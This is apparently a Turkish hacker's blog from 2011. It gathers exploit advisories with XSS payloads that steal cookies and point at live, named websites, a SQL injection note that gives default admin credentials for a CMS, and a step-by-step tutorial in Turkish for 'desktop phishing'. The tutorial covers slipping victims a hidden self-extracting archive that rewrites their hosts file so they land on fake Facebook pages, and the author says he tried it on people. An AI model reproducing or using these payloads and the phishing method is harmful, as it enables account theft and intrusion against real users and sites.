Whois

WHOIS.COM

http://domains.whois.com/

http://domains.whois.com/hosting.php?type=%22%3E%3Cscript%3Ealert%28%22DarkDevilZ%20/%20Mr.PaPaRoSSe%20/%203spi0n%22%29%3C/script%3E

Mr.PaPaRoSSe / DarkDevilz/ 3spi0n

CareerBuilder Cross Site Scripting

# Exploit Title: CareerBuilder XSS
# Date: 20.11.2011 - 05.50
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php

-------------------------------------------------------------

search box

al ert(document.cookie)

DEMO
http://www.eenbaan.nl/banen/zoeken/?keyword=">

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

http://packetstormsecurity.org/files/107157/careerbuilder-xss.txt

Sayfa of FIŞKIN

Can ciğer kuzu sarması kardeşim sayfa açmış.

http://www.facebook.com/gulsene.gavur

Gülsene Gavur :)
Beğenmeden geçmeyin.

Hayırlı olsun..

Crunch with Wordlist

Icdomains XSS

# Exploit Title: Icdomains XSS
# Date: 11.11.2011 - 18.20
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------

Searchbox

<script>alert(do cument.cookie)</script>

http://icloudcenter.net/demos/icdomains/searchresults.php

Search

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n     -  ALEXTRAX      -  sanTiq0 
Deathless  -  ZyX           -  Tarxes
53rh4+     -  bLaCk_uMo     -  PeRs 
syntaX     -  Mavi_Karalik  -  DarkCOD3R
x-Leader   -  Cyborg        -  Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

http://packetstormsecurity.org/files/106867/icloudcenter-xss.txt

Desktop Phishing

Selamun Aleyküm arkadaşlar.
Sizlere " Desktop Phishing " hakkında bir anlatım yapacağım.Bu yöntemi bende internette görmüştüm (Sonuçta Bunları Bilerek Doğmadık) denedim 1-2 kere gerçekten güzel yöntemdir.

Şimdi amaç olarak bir dosya oluşturucaz.Sonra kurban bunu açacak.Ardından örnek facebook.com adresinden giriş yapacak şifre bize gelecek.Fake mantığıdır.Desktop Phishing tarafında kurban örnek olarak facebook.com adresinde gezinmeye devam eder ama aslında fake bir sayfada gezinmektedir.Domain ismi gerçek sayfa fake.

Bunlar için windows tarafında hosts dosyasını kullanacağız.Bu hosts dosyası ise domain adlarını ve bu domainlere ait ip adreslerini saklamaktadır.

Bu hosts dosyası C:\WINDOWS\system32\drivers\etc tarafında dır. Açmak için notepad kullanabilirsiniz.

Şimdi örnek olarak bir hosts dosyamızın içinde neler var bakalım.

Evet görüldüğü gibi bu şekilde.

Örnek site olarak facebook.com olacak

Şimdi kendimize ait bir host var diyelim.Ve içine fake dosyalarını attık.
Şimdi diyelim ki facebook.com 1.1.1.1 ip adresi üzerinden.Bizim hostumuzun ip adresi ise 4.4.4.4. O zaman eğer host tarafında 1.1.1.1 olan facebook tarafını 4.4.4.4 yaparsak facebook.com domain olarak görülür ama veri için başvurduğu ip adresi 4.4.4.4 olmaz mı ? OLUR tabiki de..

O zaman hosts kısmını şu şekilde düzenliyoruz.

vet bu şekilde düzenliyoruz.Kendinize kaydetmeyin bunu kurbana yedirmemiz lazım ^^

Şimdi ne yapacağız diye basit bir tekrar yaparım.Kurbanın eğer hosts dosyasını daha demin ki gibi düzenlersek kurban facebook.com domaini üzerinden takılmaya devam eder ama aslında bizim fake ip adresinde takılmaktadır.

Şimdi buralar basitti bir diğer kısım ise kurbana bunu nasıl yaptıracağız?

Bunun için winrar tarafında ufak bir hile yapacağız.Adam örnek ddz dosyasını açtığı zaman bizim hosts dosyamız otomatik olarak kendini adamın C:\WINDOWS\system32\drivers\etc klasörüne kopyalacak.

Peki bunu nasıl yapacağız derseniz onuda anlatalım.Hazırladığımız hosts dosyasını masaüstüne alalım.
Tabiki gerekli ayarları yaptık düzenlemeleri yaptık dosya hazır.

Şimdi dosyamıza sağ tıkıyoruz ve arşive ekle diyoruz.

SFX arşivi oluştur adında bir buton var ona tıklıyoruz.genel tarafında oluyor...

Şimdi ise Gelişmiş Diyoruz ve SFX seçeneklerine tıklıyoruz.

Çıkacak yok tarafına C:\WINDOWS\system32\drivers\etc yazıyoruz.

Şimdi ise modlar tarafına gelerek tümünü gizle diyoruz.
Güncelleme kısmında ise varolan dosyaları atla diyoruz.

Ardından ise tamam tamam diyerekten çıkıyoruz.

Masaüstünde ddz.exe adında bir dosya oluşuyor.

Bunu kurbana açtırmamız lazım.Herhangi bir exe binder ile birleştirerek kurbana veriyoruz açtığı zaman ve tamam dediği zaman işlem tamamlanmış oluyor.

Bu anlatımda bu kadar dediğim gibi güzel bir yöntemdir.1-2 kişide denedim güzelcene oldu :)
Bu hack huck işlerinden anlamayan insanlar %65 yerler.Ama gereksiz yere onlara böyle birşey yapmanında anlamıyok değilmi ? ^^

Selametle / Mr.PaPaRoSSe / DarkDevilZ

Web Sayfa Çizimi

Selamun aleyküm
Bir ara modem de sorun vardı bende ne yapayım derken photoshop'u açtım ve böyle bir ders ortaya çıktı.Bu basit diyenler için yeni başlayanlara bir hazinedir diyorum.Çünkü ben kendimi biliyorum ilk açtığımda adımı zor yazmıştım ^^
Basit bir çalışma oldu mantığı anlamanız için yaptım.Birden photoshop'u açtım ve gelişi güzel bir şeyler yaptım.Eğer vakit bulursam bunun kodlamasınıda video olarak çekerim...

LİNK:
http://hotfile.com/dl/134422601/062f8da/darkdevilz.zip.html

86.177 kb.
22 dakika 12 saniye.
Şifre yok.

SmartJobBoard Cross Site Scripting

# Exploit Title: SmartJobBoard XSS
# Date: 05.11.2011 - 18.14
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------


DEMO:
http://www.smartjobboard.com/demo/search-resumes/

Keywords : Enter

http://www.smartjobboard.com/demo/search-results-resumes/?action=search&listing_type[equal]=Resume&keywords[exact_phrase]=%3Cscript%3Ealert%28%22DDz+Mr.PaPaRoSSe%22%29%3C%2Fscript%3E

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

http://packetstormsecurity.org/files/106637/smartjobboard-xss.txt

What’s happening?

Gördüğüm kadarı ile artık çoğu insan twitter tarafına geçti geçmesede bir twitter açtı.Benim yoktu açmamıştım gereksiz görmüştüm.Baktım ki bir tane açmanın zamanı gelmiş artık.Ve şeytana uyaraktan açtık işte bir adet...

https://twitter.com/#!/MrPaPaRoSSe

MyChurchWebsite Cross Site Scripting

# Exploit Title: MyChurchWebsite XSS
# Date: 04.11.2011 - 17.55
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------



search.php?pageID=search&search=XSS

http://cacop.net/search.php?pageID=search&search=%3Cscript%3Ealert%28document.cookie%29%3C/s

cript%3E

Church Website Provided by mychurchwebsite.net

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#


http://packetstormsecurity.org/files/106599/mychurchwebsite-xss.txt

Domain Shop Cross Site Scripting

# Exploit Title: Domain Shop XSS
# Date: 30.10.2011 - 19.05
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------


http://www.domainshopscript.com/demo/index.php
Search Box

"><script>alert(document.domain)</script>

© Copyright 2006 Domain Shop Script



-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n     -  ALEXTRAX      -  sanTiq0 
Deathless  -  ZyX           -  Tarxes
53rh4+     -  bLaCk_uMo     -  PeRs 
syntaX     -  Mavi_Karalik  -  DarkCOD3R
x-Leader   -  Cyborg        -  Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

Mndajans Script SQL Injection

# Exploit Title: Mndajans Script SQL Injection
# Date: 29.10.2011 - 16.13

# Author: Mr.PaPaRoSSe

# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------

Scripts are mndbilgisayar
-------------------------------
default user : mndajans
default pass : servis
Admin panel : /admin/

Default User & Pass & Admin demo
http://alpdizayn.com.tr/admin/
--------------------------------
MND Kontrol PANEL
SQL Ýnjection

UrunDetay&id=4' SQL

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------

3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J

[And DD'z Family]

[DarkDevilz - Defence And Destruction Group'z - TURKEY]

http://packetstormsecurity.org/files/106419/mndajans-sql.txt